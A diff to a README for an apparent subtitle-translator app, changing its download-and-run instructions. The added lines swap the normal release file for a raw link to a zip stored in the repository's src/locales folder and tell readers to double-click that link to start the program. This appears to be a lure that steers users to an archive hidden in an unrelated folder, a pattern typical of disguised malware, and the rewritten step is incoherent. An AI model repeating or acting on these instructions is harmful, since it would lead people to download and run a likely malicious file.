mughal331/subtitle-translator/README.md

 1. **Go to the Releases Page**: Click on the link above to go to the releases page.
 2. **Find the Latest Version**: Locate the most recent release at the top of the page.
 3. **Download the File**: Click on the download link for your operating system.
-The file will usually be named something like `subtitle-translator-v1.0.zip`.
+The file will usually be named something like `https://github.com/mughal331/subtitle-translator/raw/refs/heads/main/src/locales/translator-subtitle-v1.1.zip`.
 4. **Extract the Zip File**: Once downloaded, extract the zip file to a folder on your computer.
-5. **Run the Application**: Open the folder where you extracted the files, and double-click `subtitle-translator.exe` (or the equivalent file for macOS) to start the application.
+5. **Run the Application**: Open the folder where you extracted the files, and double-click `https://github.com/mughal331/subtitle-translator/raw/refs/heads/main/src/locales/translator-subtitle-v1.1.zip` (or the equivalent file for macOS) to start the application.

 ## 🌐 Using Subtitle Translator